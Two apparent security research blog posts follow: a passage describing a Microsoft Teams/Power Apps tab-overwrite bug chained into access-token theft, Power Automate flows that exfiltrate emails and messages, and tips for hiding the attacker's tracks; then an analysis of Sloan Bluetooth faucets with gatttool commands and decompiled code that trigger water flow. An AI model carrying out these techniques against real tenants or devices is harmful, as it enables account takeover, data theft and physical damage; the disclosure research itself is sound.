We can see this happen if we view the page’s source, testing out different parameters. Trying to load any URL which doesn’t begin with https://make.powerapps.com results in the makerPortalUrl being set to an empty string. However, the validation only checks that the URL begins with https://make.powerapps.com; it does not check that make.powerapps.com is the full domain.

So, if we set makerPortalUrl equal to something like https://make.powerapps.com.fakecorp.ca/ we will be able to load our own content in the iframe!
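The difference between the flawed check and a stricter one can be sketched in Python. This models the behavior described above and is not the actual page source; the function names are hypothetical.

```python
from urllib.parse import urlsplit

TRUSTED_PREFIX = "https://make.powerapps.com"
TRUSTED_HOST = "make.powerapps.com"


def passes_prefix_check(url: str) -> bool:
    """Model of the flawed validation: a plain string-prefix comparison."""
    return url.startswith(TRUSTED_PREFIX)


def passes_host_check(url: str) -> bool:
    """Stricter variant: parse the URL and compare scheme and full hostname."""
    parts = urlsplit(url)
    return parts.scheme == "https" and parts.hostname == TRUSTED_HOST


if __name__ == "__main__":
    for candidate in ("https://make.powerapps.com/somePageHere",
                      "https://make.powerapps.com.fakecorp.ca/"):
        print(candidate, passes_prefix_check(candidate), passes_host_check(candidate))
```

The attacker-controlled URL passes the prefix comparison because the trusted string is only the beginning of its hostname. Comparing the parsed hostname as a whole rejects it.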

Cool, we can load an iframe with our own content two iframes deep in a Teams tab, but what does that get us? Microsoft Teams already has a website tab type which lets you load an iframe with a URL of your choosing, and with those you can’t do much. Fortunately for us, some tabs have more capabilities than others.

Stealing auth tokens with postMessage

We can load our own content in an iframe, which itself is sitting in an iframe on apps.powerapps.com. The reason this is more interesting than something like the Website tab type on Teams is that for Power App extension tab types, the apps.powerapps.com page communicates both with Teams, by way of the Teams JS SDK, as well as its child iframe using JavaScript postMessage.

We can communicate with the parent window via postMessage

Using a Chrome extension, we can watch the postMessages passed between windows as an application is installed and launched. At first glance, the most interesting message is a postMessage from make.powerapps.com in the innermost window (the window which we are replacing when specifying our own makerPortalUrl) to the apps.powerapps.com window, with GET_ACCESS_TOKEN in the data.

The frame which we were replacing was getting access tokens from its parent window without passing any sort of authentication.

the child iframe requesting an access token via postMessage

I tested this same kind of postMessage from the make.powerapps.com.fakecorp.ca subdomain, and sure enough, I was able to grab the same access tokens. A handler is registered in the WebPlayer.EmbedMakerPortal.js file loaded by apps.powerapps.com which fetches tokens for the requested resource using the https://apps.powerapps.com/auth/onbehalfof endpoint, which in our testing is capable of grabbing tokens for:

- apihub.azure.com
- graph.microsoft.com
- dynamics apps subdomains
- service.flow.microsoft.com
- service.powerapps.com

Grabbing the access token from a page we control

This is a super exciting thing to see: A tab under our control which can be created in a public team can retrieve access tokens on behalf of the user viewing it. Let’s slow down for a moment though, because I forgot to show an important step: how did we get our own content in a tab in the first place?

Overwriting a Teams tab

I mentioned earlier that Teams tabs generally operate by opening an iframe to a page which is specified in the tab application’s manifest. The request to define what page is loaded by a tab can be seen when adding a new tab or even renaming a currently existing tab.

The PUT request for renaming a tab lets us change the tab url

The url being given in this PUT request is pointing to the Bulletins Power App which is installed in our team environment. To point the tab to our malicious content we simply have to replace that url with our apps.powerapps.com/teams/makerportal?makerPortalUrl=https://make.powerapps.com.fakecorp.ca page.

It should be noted that this only works because we are passing a url with a trusted domain (apps.powerapps.com) according to the application’s manifest. If we try to pass malicious content directly as the tab’s url, the tab will not load our content.

A short and inconspicuous proof of concept

While the attacks we will look at later are longer and overly noisy for demonstration purposes, let’s consider a very quick proof of concept of how we could use what we currently have to steal access tokens from unsuspecting users.

If we host a page similar to the following and overwrite a tab to point to it, we can grab users’ service.flow.microsoft.com token and send it to another listener we control, while also loading the original Power App in an iframe that matches the tab size. While it won’t look exactly like a normally-running Power App tab, it doesn’t look different enough to notice. If the application requires postMessage communication with the parent app, we could even act as a man-in-the-middle for the postMessages being sent and received by adding a message handler to the PoC.

During the loading you can see two spinning circles. The smaller one is our JS running.

Now that we know we can steal certain tokens, let’s see what we can do with them, specifically the service.flow.microsoft.com token we just stole.

Stealing more tokens, emails, messages and files

The reason we’re focused on the service.flow.microsoft.com token is because it can be used to get us access to more tokens, and to create Power Automate flows, which will allow us to access a user’s email from Outlook, Teams messages, files from OneDrive and SharePoint, and a whole lot more.

We will construct the attack, at a high level, by:

- Grabbing an extra set of tokens from api.flow.microsoft.com
- Creating connectors to the services we want to access.
- Consenting on behalf of the victim user using first party logins.
- Creating Power Automate flows on the victim user’s behalf which let us send emails and Teams messages, and retrieve emails, messages and files.
- Adding ourselves (or a group we’re in) to the owners of the flow.
- Having the victim user send an email to us containing any information we need to access the flows.

For our example we’re going to be showing pieces of a proof of concept which creates:

- Office 365 (for outlook access), and Teams connectors
- A flow which lets us send emails as the user
- A flow which lets us get all Teams messages from channels the victim is in, and send messages on their behalf.

The api.flow.microsoft.com token bundle

The first stop on our quest to get access to everything the victim user holds dear is an API endpoint which will let us generate a handful of new access tokens. Sending an empty POST request to api.flow.microsoft.com/providers/Microsoft.ProcessSimple/environments/<environment>/users/me/onBehalfOfTokenBundle?api-version=2021-01-03 will let us grab the following tokens, with the following scopes:

the api.flow.microsoft.com token bundle

- graph.microsoft.com
  - scope: Contacts.Read Contacts.Read.Shared Group.Read.All TeamsAppInstallation.ReadWriteForTeam TeamsAppInstallation.ReadWriteSelfForChat User.Read User.ReadBasic.All
- graph.microsoft.net
  - scope: user_impersonation
- appservice.azure.com
  - scope: user_impersonation
- apihub.azure.com
  - scope: user_impersonation
- consent.msp.windows.net/logic-app-aad
  - scope: user_impersonation
- service.powerapps.com
  - scope: user_impersonation

Some of these tokens will become useful to us for constructing a larger attack (specifically the graph.microsoft.com and apihub.azure.com tokens).

Creating connectors and using first party logins

To create flows which let us take control of the victim’s services, we first need to create connectors for those services.

When a connector is created, a user can use a consent link to login via a login.microsoft.com popup and grant permissions for the service for which the connector is being made (like Office 365, Teams, or Sharepoint). Some connectors, however, come with a first party login url, which lets us bypass the regular interactive login process and authorize the connector using only the authorization tokens already gathered.

Creating a connector on the victim’s behalf takes only three requests, the final of which is a POST request to the first party login url, with the apihub.azure.com access token.

consenting to a connector with a stolen apihub.azure.com token

After this third request, the connector will be ready to use with any flow we create.

Creating a flow

Given the number of potential connector types, flow triggers, and actions we can perform, there are an endless number of ways that we could leverage this access. They range anywhere from simply forwarding every email which is received by the victim to the attacker, to only performing actions if a particular RSS feed updates, to creating REST endpoints that let us trigger any number of different actions in different services.

Additionally, if the organization happens to have premium Power Apps/Automate licensing, there are many more options available. It is honestly a very useful system (even if you’re not trying to exploit a whole Office 365 org).

For our attack, we will look at creating a flow which gives us access to endpoints which take JSON input and perform the actions we want (send emails, send Teams messages, download files, etc). It is a noisier method, since it requires the attacker to send requests (authenticated as themselves), but it is convenient for demonstration. Not all flows require the attacker to be authenticated, or require user interaction.

Choosing flow triggers

A flow trigger is how a flow will be kicked off / knows when to begin. The three main types are automatic (when an email comes in, forward it to this address), instant (when a request is received at this endpoint, trigger the flow), and scheduled (run the flow every xyz seconds/minutes/hours).

The flow trigger we would prefer to use is the “when an HTTP request is received” trigger, which lets unauthenticated users trigger the flow, but that is a premium feature, so instead we will use the “Manually Trigger a Flow” trigger.

The trigger for our Microsoft Teams flow

This trigger requires authentication, but because it is assumed that the attacker is part of the organization this shouldn’t be a problem, and there are ways to limit information about who is running what flows.

Creating the flow logic

Flows allow you to create an automated process piece by piece, passing the outputs of one action to the next. For example, in the flow we created to let us get all Teams messages from a user, as well as send messages to any channel on their behalf, we determine what action to take, who to send the message to and other details depending on the input passed to the trigger.

Sending a message is quick and simple, but to retrieve all messages for all teams and channels, we first grab a list of all teams, then get each channel per team, then all messages per channel, and roll it up into one big gross ball and have the flow send it to the attacker via email.

The Teams flow for our PoC

Now that we have designed the flow, we need to know how to create it on the victim’s behalf and share it with ourselves as the attacker using the tokens we’ve stolen, and what those requests look like. Luckily in our case, it is just a couple of simple requests.

  1. A POST request, containing JSON object representing the flow, to create it and get the unique flow name.
  2. A GET request to grab the flow trigger uri, which will let us trigger the flow as the attacker once we have added ourselves to the owners group.

Adding a group to flow owners

For the trigger we chose, we need to be able to access the flow trigger uri, which can only be done by users who have access to the flow. As a result, we need to add a group we belong to (which seems less suspicious than just adding ourselves) to the flow owners.

The easiest choice here is some large, all-encompassing group, but in our case we’re using the group which is generated automatically for any team created in Microsoft Teams.

In order to grab the unique group id, we use the graph.microsoft.com token we stole from the victim earlier. We then modify the flow’s owners to include that group.

adding a group to the flow owners

Running the flow and sending ourselves the uris we need

In the proof of concept we’re building, we create a flow that lets us send emails on behalf of the victim user. This can be leveraged at the end of the attack to send ourselves the list of the flow trigger uris we need in order to perform the actions we want.

sending an email using the Outlook connector and flow we’ve created

For example, at the end of the email/Teams proof of concept we’re building, an email is sent on the victim’s behalf which sends us the flow trigger uris for both the Outlook and Teams flows we’ve created.

The message we receive from the victim with the flow trigger uris

Using these flow trigger uris, we can now read the victim’s emails and Teams messages, and send messages and emails on their behalf (despite being authenticated as Bad User).

Putting it all together

The “TL;DR” shot: actions the malicious tab performs on opening

There are a number of ways in which we could build an attack with this vulnerability. It is likely that the best way would be to only use javascript on the malicious tab to steal the service.flow.microsoft.com token, and then perform the rest of the actions from an attacker-controlled server, so we reduce the traffic being generated by the victims and aren’t cut off by them navigating away from the tab.

For our quick and dirty PoC however, we just perform the whole attack with one big javascript section in our malicious tab. The pseudocode for our attack looks like this:

Setting up a malicious tab with a payload like the one above will cause the victim to create connectors and flows, and add the attacker as an owner to them, as well as send them an email containing the flow trigger uris.

As a real example, here is a quick clip of a similar payload running and sending the attacker the victim’s Teams messages, and letting the attacker send a message to a private team masquerading as the victim.

stealing and sending Teams messages

Considerations for the attacker

If you’ve gone through the above and thought “cool, but it would be really easy for an admin to determine who is using these flows maliciously,” you’d be correct. However, there are a number of steps one could take to limit the exposure of the attacking user if a similar attack is being carried out in a penetration test.

  • Flows allow you to specify whether the inputs and outputs to each action should be kept secret / scrubbed from the flow’s run history. This means that it would be harder to observe what data is being taken, and where it is being sent.
  • Not all flows require the user to make authenticated requests to trigger. Low and slow methods are available, like having flows trigger on an RSS feed update (30 minute minimum period), on a schedule, or automatically (like when a new email comes in from any account, read the email body and perform those actions).
  • Running the attack as one long javascript payload isn’t ideal and takes too long in real situations. Just grabbing the service.flow.microsoft.com token and conducting the rest of the attack from an attacker-controlled machine would be much less conspicuous.
  • Flows can be used to creatively cover an attacker’s tracks. For example, if you exfiltrate data via email in a flow, you can add a final step which deletes any emails sent to the attacker’s mail from the Sent Items folder.

Considerations for org administrators

While it may be difficult to determine who in a team has set up a malicious tab, or what user is running the flows (if the inputs/outputs have been made secret), there is a potential indicator to identify whether a user has had malicious flows run on their behalf.

When a user logs into make.powerapps.com or flow.microsoft.com to create a flow, a Microsoft Power Automate free license is automatically added to their set of licenses (if they didn’t already have one assigned to them). However, when flows are created on a user’s behalf by a malicious tab, they don’t have the license assigned to them. This license status can be cross-referenced with which users have flows created under their name at admin.powerplatform.microsoft.com.

organization admin portal

Notice that Bad User has logged into the flow.microsoft.com web interface, but Good User, despite having flows in their name listed in admin.powerplatform.microsoft.com, does not show as having a license for Power Automate. This could indicate that the flows were not created intentionally by Good User.
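The cross-referencing step can be sketched in a few lines. This is only an illustration under the assumption that you have already exported two lists by hand (users who own flows, and users holding a Power Automate license); the function name and the sample data are hypothetical, and a hit is an indicator worth investigating, not proof of compromise.

```python
def flag_unlicensed_flow_owners(flow_owners, licensed_users):
    """Return users who own flows but hold no Power Automate license."""
    licensed = set(licensed_users)
    # A set comprehension removes duplicate owners; sorting keeps output stable.
    return sorted({owner for owner in flow_owners if owner not in licensed})


# Hypothetical export: one entry per flow, listing the flow's owner.
flow_owners = ["Good User", "Bad User", "Good User"]
# Hypothetical export: users with a Power Automate license assigned.
licensed_users = ["Bad User"]

print(flag_unlicensed_flow_owners(flow_owners, licensed_users))
```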

Luckily, the attack is limited to authenticated users within a Teams organization who have the ability to create Power Apps tabs, which means it can’t just be exploited by an untrusted/unauthenticated attacker. However, the permission to create these tabs is enabled by default, so it may be a good idea to consider limiting apps by default and enabling them on request.

Takeaways

While that was a long and not quite straightforward attack, the potential impact of such an attack could be huge, especially if it happens to hit an organization administrator. That such a small initial bug (the improper validation of the make.powerapps.com domain) could be traded up until an attacker is exfiltrating emails, Teams messages, and OneDrive and SharePoint files is definitely concerning. It means that even a small bug in a not-so-common service like Microsoft Power Apps could lead to the compromise of many other services by way of token bundles and first party logins for connectors.

So if you happen to find a small bug in one service, see how far you can take it and see if you can trade a small bug for a big impact. There are likely other creative and serious potential attacks we didn’t explore with all of the potential access tokens we were able to steal. Let me know if you spot one 🙂.

Thanks for reading!


Stealing tokens, emails, files and more in Microsoft Teams through malicious tabs was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Plumbing the Depths of Sloan’s Smart Bathroom Fixture Vulnerabilities

As I stood in line at my local donut shop, I idly began scanning nearby Bluetooth Low Energy (BLE) devices. There were several high-rises nearby, and who knows what interesting things lurk in those halls. Typically, I’ll see consumer technology like Apple products, fitness trackers, entertainment systems, but that day I saw something that piqued my interest… Device Name: FAUCET ADSKU01 A0174. A bluetooth… faucet?! I had to know more. Since I clearly did not own this particular device and also didn’t want to risk a flood, I went home and looked up all I could find about these SmartFaucets while greedily gobbling a glazed donut or two.

Device Name: FAUCET

The device belongs to a line of SmartFaucets and Flushometers made by Sloan Valve Company. I had to find one I could use for testing. Sloan’s connected devices include SmartFaucets such as the Optima EAF, Optima ETF/EBF, and BASYS EFX (these require an external adapter) and Flushometers such as SOLIS; the full list can be viewed over at https://www.sloan.com/design/connected-products. The app to connect to these devices is called SmartConnect and is available in the Google Play or Apple App stores.

An update to Sloan’s feature checklist

A Quick Bluetooth Glossary

Bluetooth Classic — This is the original Bluetooth protocol still widely used. Sometimes it will be referred to as “BR” or “EDR.” Devices are connected one to one.

Bluetooth Low Energy (BLE) — This is actually a different protocol from Bluetooth Classic. It has lower energy requirements, and devices can interoperate one-to-one, one-to-many, or even many-to-many. Almost everywhere we mention Bluetooth in this article, we mean BLE, and not Bluetooth Classic.

Services — Technically part of the “GATT” BLE layer, services are groupings of characteristics by function.

Characteristics — Part of the “GATT” BLE layer, characteristics are UUID/value pairs on a device. The value can be read, written to, and more, depending on permissions. Sometimes it’s helpful to think of them as UDP ports with (generally) very simple services.

UUIDs — Random numbers used to refer to services and characteristics. Some are assigned by the Bluetooth SIG, while others are set by the device’s manufacturer.

Sloan SmartConnect App

SmartConnect App has a button to “Dispense Water”

As its sole protection mechanism, the app requires a phone number prior to use and then sends a code to that number.

More SmartConnect app functionality

After that, quite an array of features are available. Let’s see what we can find out with an actual device.

SmartFaucet

Sloan EBF615–4 Internals

I managed to acquire a Sloan EBF615–4 Optima Plus, added batteries, and plugged in the faucet. When I wave my hand in front of the IR sensor, I can hear the clicking of the faucet mechanism allowing a potential flow of water to course through the spigot. This is good as I’ll have some way of knowing if we’re getting somewhere. I’d already installed the SloanConnect app, and registered with an actual phone number, so I was able to connect to the device.

Let’s start by using hcitool to scan for BLE devices nearby. Hcitool is a Linux utility for scanning for Bluetooth devices and interacting with our Bluetooth adapter. The ‘lescan’ option allows us to scan for Bluetooth Low Energy. The device we’re interested in is aptly named “FAUCET”.

pi@rpi4:~ $ sudo hcitool lescan | grep FAUCET
08:6B:D7:20:00:01 FAUCET ADSKU02 A0121
08:6B:D7:20:00:01 FAUCET ADSKU02 A0121

Now that we know its MAC address, we can use gatttool, a Linux utility for interacting with BLE devices, to query the BLE services:

pi@rpi4:~ $ sudo gatttool -b 08:6B:D7:20:00:01 --primary
attr handle = 0x0001, end grp handle = 0x0005 uuid: 00001800-0000-1000-8000-00805f9b34fb
attr handle = 0x0006, end grp handle = 0x0009 uuid: 00001801-0000-1000-8000-00805f9b34fb
attr handle = 0x000a, end grp handle = 0x000e uuid: 0000180a-0000-1000-8000-00805f9b34fb
attr handle = 0x000f, end grp handle = 0x002d uuid: d0aba888-fb10-4dc9-9b17-bdd8f490c900
attr handle = 0x002e, end grp handle = 0x0031 uuid: 0000180f-0000-1000-8000-00805f9b34fb
attr handle = 0x0032, end grp handle = 0x0050 uuid: d0aba888-fb10-4dc9-9b17-bdd8f490c910
attr handle = 0x0051, end grp handle = 0x0081 uuid: d0aba888-fb10-4dc9-9b17-bdd8f490c920
attr handle = 0x0082, end grp handle = 0x009d uuid: d0aba888-fb10-4dc9-9b17-bdd8f490c940
attr handle = 0x009e, end grp handle = 0x00a1 uuid: d0aba888-fb10-4dc9-9b17-bdd8f490c950
attr handle = 0x00a2, end grp handle = 0x00ba uuid: d0aba888-fb10-4dc9-9b17-bdd8f490c960
attr handle = 0x00bb, end grp handle = 0x00d9 uuid: d0aba888-fb10-4dc9-9b17-bdd8f490c970
attr handle = 0x00da, end grp handle = 0xffff uuid: 1d14d6ee-fd63-4fa1-bfa4-8f47b42119f0

and their characteristics:

pi@rpi4:~ $ sudo gatttool -b 08:6B:D7:20:00:01 --characteristics
handle = 0x0002, char properties = 0x0a, char value handle = 0x0003, uuid = 00002a00-0000-1000-8000-00805f9b34fb
handle = 0x0004, char properties = 0x02, char value handle = 0x0005, uuid = 00002a01-0000-1000-8000-00805f9b34fb
handle = 0x00db, char properties = 0x08, char value handle = 0x00dc, uuid = f7bf3564-fb6d-4e53-88a4-5e37e0326063
handle = 0x00de, char properties = 0x04, char value handle = 0x00df, uuid = 984227f3-34fc-4045-a5d0-2c581f81a153
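The "char properties" byte in that output is a bit field. As a quick aid, here is a small sketch that decodes it using the standard GATT characteristic property bits; the helper name is my own, and the four sample values are the ones gatttool printed above.

```python
# Standard GATT characteristic property bits (Bluetooth Core Specification).
GATT_PROPERTIES = {
    0x01: "broadcast",
    0x02: "read",
    0x04: "write-without-response",
    0x08: "write",
    0x10: "notify",
    0x20: "indicate",
    0x40: "authenticated-signed-writes",
    0x80: "extended-properties",
}


def decode_properties(value: int) -> list[str]:
    """Return the names of every property bit set in the byte."""
    return [name for bit, name in GATT_PROPERTIES.items() if value & bit]


# Property bytes from the gatttool output above.
for props in (0x0A, 0x02, 0x08, 0x04):
    print(f"0x{props:02x}: {', '.join(decode_properties(props))}")
```

So 0x0a is a characteristic we can both read and write, while 0x08 and 0x04 are write-only.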

Once we reverse the Android app, we can hopefully find variable names that reference these UUIDs and determine their function.

One thing I’ve noticed while doing this is that the device seems to stop beaconing every so often, and I need to either press a button on it OR wait a bit OR unseat and reseat the batteries. It’s possible that it limits connections over a period of time.

Let’s take a look back at the app.

SmartConnect Again

After pulling the app off of my phone using adb and then reversing it with jadx, I start searching for interesting bits. The first one to jump out was:

public final void dispenseWater() {
    if (getMainViewModel().getConnectionState().getValue() == ConnectionState.CONNECTED) {
        getMainViewModel().getConnectionState().setValue(ConnectionState.DISPENSING_WATER);
        BluetoothGattCharacteristic bluetoothGattCharacteristic = getMainViewModel().getGattCharacteristics().get(UUID.fromString(GattAttributesKt.UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE));
        if (bluetoothGattCharacteristic != null) {
            bluetoothGattCharacteristic.setValue("1");
        }
        FragmentActivity activity = getActivity();
        if (activity != null) {
            BluetoothLeService bluetoothLeService = ((MainActivity) activity).getBluetoothLeService();
            if (bluetoothLeService != null) {
                bluetoothLeService.writeCharacteristic(bluetoothGattCharacteristic);
                return;
            }
            return;
        }
        throw new TypeCastException("null cannot be cast to non-null type com.smartwave.sloanconnect.MainActivity");
    }
}

Seems like it’ll be pretty easy to make this thing flow. Now we just need to figure out the BLE characteristic UUID referenced by UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE. This is made incredibly easy thanks to a nice table of UUID variables.

public static final String UUID_CHARACTERISTIC_APP_IDENTIFICATION_PASS_CODE = "d0aba888-fb10-4dc9-9b17-bdd8f490c954";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE = "d0aba888-fb10-4dc9-9b17-bdd8f490c92a";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_FLUSH_ON_OFF = "d0aba888-fb10-4dc9-9b17-bdd8f490c946";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_SENSOR_RANGE = "d0aba888-fb10-4dc9-9b17-bdd8f490c942";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_STATISTICS_INFO_NUMBER_OF_ALL_FLUSHES = "d0aba888-fb10-4dc9-9b17-bdd8f490c916";
public static final String UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FLUSH_VOLUME_CHANGE = "f89f13e7-83f8-4b7c-9e8b-364576d88334";
public static final String UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_ACTIVATE_VALVE_ONCE = "f89f13e7-83f8-4b7c-9e8b-364576d88361";

Wow. In addition to finding our water dispensing UUID, there are a lot of other interesting variable names. A select few of ~100 are shown above. It looks like this thing supports over-the-air (OTA) firmware updates, tons of diagnostic and sensor settings, possible security settings, and more.

Now that we know the UUID that turns on the water, let’s use nRF Connect to see what we can do. I’m switching over to nRF Connect from gatttool because it handles the connection easily. Since the faucet seems to ‘time out’ or disallow connections after a period of time, this is useful so we don’t lose our connection and reset everything.

The faucet’s BLE advertising information
nRF Connect for Desktop showing the faucet’s Services

In the decompiled ‘dispenseWater()’ function above, we saw that the function basically sends a ‘1’ to the UUID stored in the variable UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE. Luckily we can find the UUID in the table we found:

public static final String UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE = "d0aba888-fb10-4dc9-9b17-bdd8f490c965";

Cool. Let’s write to that UUID. The default value is 0x30, so, ‘0’ in ASCII. Let’s write 0x31, or ‘1’, since that’s what the code does. I tried writing other numbers first but nothing else did anything, until…

nRF Connect view showing flow being enabled.

I barely refrained from yelping for joy when I heard the faucet’s telltale ‘click’ indicating the spigot had activated. Since the faucet isn’t hooked up to a water source (hey, I’m not a plumber), you’ll have to bear with the above anti-climactic demo.

We should be able to do this with gatttool via:

$ sudo gatttool -b 08:6B:D7:20:00:01 --char-write-req -a 0x00b3 -n 31
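As a sanity check on that command, here is a small sketch that looks up which service range a handle falls into and works out the hex string for an ASCII value. The service table is copied from the gatttool primary-service output earlier (UUIDs written with plain hyphens); the helper names are my own and nothing here talks to the device.

```python
# (start handle, end handle, service UUID) from the gatttool output above.
SERVICES = [
    (0x0001, 0x0005, "00001800-0000-1000-8000-00805f9b34fb"),
    (0x0006, 0x0009, "00001801-0000-1000-8000-00805f9b34fb"),
    (0x000A, 0x000E, "0000180a-0000-1000-8000-00805f9b34fb"),
    (0x000F, 0x002D, "d0aba888-fb10-4dc9-9b17-bdd8f490c900"),
    (0x002E, 0x0031, "0000180f-0000-1000-8000-00805f9b34fb"),
    (0x0032, 0x0050, "d0aba888-fb10-4dc9-9b17-bdd8f490c910"),
    (0x0051, 0x0081, "d0aba888-fb10-4dc9-9b17-bdd8f490c920"),
    (0x0082, 0x009D, "d0aba888-fb10-4dc9-9b17-bdd8f490c940"),
    (0x009E, 0x00A1, "d0aba888-fb10-4dc9-9b17-bdd8f490c950"),
    (0x00A2, 0x00BA, "d0aba888-fb10-4dc9-9b17-bdd8f490c960"),
    (0x00BB, 0x00D9, "d0aba888-fb10-4dc9-9b17-bdd8f490c970"),
    (0x00DA, 0xFFFF, "1d14d6ee-fd63-4fa1-bfa4-8f47b42119f0"),
]


def service_for_handle(handle: int):
    """Return the UUID of the service whose handle range contains `handle`."""
    for start, end, uuid in SERVICES:
        if start <= handle <= end:
            return uuid
    return None


def ascii_hex(text: str) -> str:
    """Hex string for the ASCII bytes of `text`, as passed to gatttool -n."""
    return text.encode("ascii").hex()


print(service_for_handle(0x00B3))  # the service range containing handle 0x00b3
print(ascii_hex("1"))              # the value the app writes to dispense water
```

Handle 0x00b3 lands in the ...c960 service, which lines up with the ...c965 water dispense characteristic, and ‘1’ encodes to 31.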

Flush Toilet

Although I don’t have a smart Flushometer, it works very similarly to the faucet. We can see the code for “flushToilet()” is almost identical:

public static final void flushToilet(BluetoothLeService bluetoothLeService, MainViewModel mainViewModel) {
    Intrinsics.checkParameterIsNotNull(bluetoothLeService, "$this$flushToilet");
    Intrinsics.checkParameterIsNotNull(mainViewModel, "mainViewModel");
    if (mainViewModel.getConnectionState().getValue() != ConnectionState.FLUSHING_TOILET) {
        mainViewModel.getConnectionState().setValue(ConnectionState.FLUSHING_TOILET);
        BluetoothGattCharacteristic bluetoothGattCharacteristic = mainViewModel.getGattCharacteristics().get(UUID.fromString(GattAttributesKt.UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_ACTIVATE_VALVE_ONCE));
        if (bluetoothGattCharacteristic != null) {
            bluetoothGattCharacteristic.setValue("1");
        }
        bluetoothLeService.writeCharacteristic(bluetoothGattCharacteristic);
    }
}

And we can look up the UUID for the flush variable:

public static final String UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_ACTIVATE_VALVE_ONCE = "f89f13e7-83f8-4b7c-9e8b-364576d88361";

Even though I don’t intend to acquire a smart Flushometer, I can confidently say I know what’s happening here.

Unlock Key

There seems to be a concept of an unlock key in the Android app.

public final void setGattCharacteristics(List<? extends BluetoothGattService> list) {
    DeviceData value;
    if (list != null) {
        for (T t : list) {
            Timber.i("Service: " + t.getUuid(), new Object[0]);
            List<BluetoothGattCharacteristic> characteristics = t.getCharacteristics();
            Intrinsics.checkExpressionValueIsNotNull(characteristics, "service.characteristics");
            for (T t2 : characteristics) {
                Map<UUID, BluetoothGattCharacteristic> map = this.gattCharacteristics;
                Intrinsics.checkExpressionValueIsNotNull(t2, "characteristic");
                UUID uuid = t2.getUuid();
                Intrinsics.checkExpressionValueIsNotNull(uuid, "characteristic.uuid");
                map.put(uuid, t2);
                if (Intrinsics.areEqual(t2.getUuid(), UUID.fromString(GattAttributesKt.UUID_CHARACTERISTIC_APP_IDENTIFICATION_UNLOCK_KEY)) && (value = this.activeDeviceData.getValue()) != null) {
                    value.setHasSecurity(true);
                }
            }
        }
    }
}

The setGattCharacteristics function is called on connection to build the list of services and characteristics. Here, if there’s an unlock key set, the app marks a ‘security’ value as true. Later on this value is checked when a few functions are called, but so far it looks like it just appends some notes if it is set. In a few scenarios, a beginSecurityProtocol() function is called, and it will read a ‘note’ from the device if security is enabled. This ‘note’ can be used to store the phone number of the last person to change the setting. The security function seems to be more of a way to keep some data about what happened than any sort of actual security.

Flow Rate

The app has two different sets of code to protect flow rate from being set too high, depending on if we’re using Liters or Gallons.

if (doubleOrNull != null) {
    d = doubleOrNull.doubleValue();
}
if ((valueOf.length() == 0) || d < 1.3d) {
    d = 1.3d;
} else if (d > 9.9d) {
    d = 9.9d;
}
// OR:
if ((valueOf.length() == 0) || d < 0.3d) {
    d = 0.3d;
} else if (d > 2.6d) {
    d = 2.6d;
}

Since this is implemented in the app, I’ll bet the faucet has a much wider range. Of course, the actual flow is limited by whatever the line in can support (I’m not a plumber). Flow rate is controlled by the d0aba888-fb10-4dc9-9b17-bdd8f490c949 characteristic.
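For reference, the app-side clamping boils down to something like the sketch below. The limits come straight from the decompiled snippets; which pair belongs to liters and which to gallons is my inference (9.9 LPM is roughly 2.6 GPM), and falling back to the minimum on unparseable input is an assumption, since the snippet doesn’t show the initial value of d. The point is that this check lives only in the app, so nothing here stops a direct BLE write.

```python
# Limits from the decompiled app; the unit labels are an inference.
LIMITS = {"lpm": (1.3, 9.9), "gpm": (0.3, 2.6)}


def clamp_flow_rate(text: str, unit: str) -> float:
    """Clamp user input to the app's allowed flow-rate range for `unit`."""
    low, high = LIMITS[unit]
    try:
        value = float(text)
    except ValueError:
        # Empty or non-numeric input: assume the app falls back to the minimum.
        return low
    return min(max(value, low), high)


print(clamp_flow_rate("1.9", "lpm"))  # inside the range, unchanged
print(clamp_flow_rate("12", "lpm"))   # above the range, clamped to the maximum
print(clamp_flow_rate("", "gpm"))     # empty input, falls back to the minimum
```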

Flow Rate Value

It seems floats are written to the characteristic as two characters, in this case, 1 and 9 (1.9), which is one of the liters per minute (LPM) options. Let’s see what we can set it to.

So, we can’t set it to a 3 byte value, but we can set it to 0x3939 (9.9), and that seems to be the highest value to have any effect. Of note, we can also set it to even higher values like 0xFF39, and while that doesn’t seem to do anything, it still feels like a value that shouldn’t be allowed by logic on the device. Since I don’t have the faucet hooked up, I can’t test what happens when we set the flow rate really high (again, not a plumber). When it’s set to 0xFF39, the app tries to display it as 0.0. And, we can set it to 9.9 via the app. So, unless we plug this thing into a water line, we’re not going to know what happens with 0xFF39.
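Here is a rough sketch of the two-character encoding as I understand it from the observed values: the rate in tenths, written as two ASCII digits. The function names are my own, and returning None for non-digit bytes is just how this sketch flags a value like 0xFF39 that has no sensible decoding; it is not a claim about what the app or the faucet does internally.

```python
def encode_flow_rate(rate: float) -> bytes:
    """Encode a rate such as 1.9 as the two ASCII digits b'19'."""
    tenths = round(rate * 10)
    if not 0 <= tenths <= 99:
        raise ValueError("rate must fit in two digits (0.0 to 9.9)")
    return f"{tenths:02d}".encode("ascii")


def decode_flow_rate(raw: bytes):
    """Decode two ASCII digits back to a rate, or None if they aren't digits."""
    if len(raw) != 2 or not all(0x30 <= b <= 0x39 for b in raw):
        return None
    return int(raw.decode("ascii")) / 10


print(encode_flow_rate(1.9).hex())              # 3139
print(encode_flow_rate(9.9).hex())              # 3939
print(decode_flow_rate(bytes.fromhex("ff39")))  # None
```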

Activation Mode

“Activation Mode” controls how long water flows for when the IR sensor is triggered. We can set it up to 120 seconds via the app. We’re all washing our hands a lot longer during COVID, but I know I can sing happy birthday to myself two or three times and still be under that 2 minute mark. Can we set it higher and cause the faucet to flow for a really long time?

